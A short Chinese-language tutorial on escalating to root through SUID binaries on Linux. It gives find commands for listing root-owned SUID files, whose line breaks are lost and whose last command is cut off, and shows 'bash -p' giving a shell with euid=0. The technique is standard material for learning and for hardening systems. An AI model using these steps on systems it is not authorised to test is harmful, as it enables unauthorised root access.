suid是linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有suid权限,那么就可以利用系统中的二进制文件和工具来进行root提权。
以下命令可以发现系统上运行的所有suid可执行文件。具体来说,命令将尝试查找具有root权限的suid的文件。
find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls
以上所有二进制文件都将以root用户权限执行,因为它们的权限中包含s,并且对应的是root权限。
bash
以下命令将以root权限打开一个bash shell。
bash -pbash-3.2# iduid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
以上就是linux下如何利用suid提权的详细内容。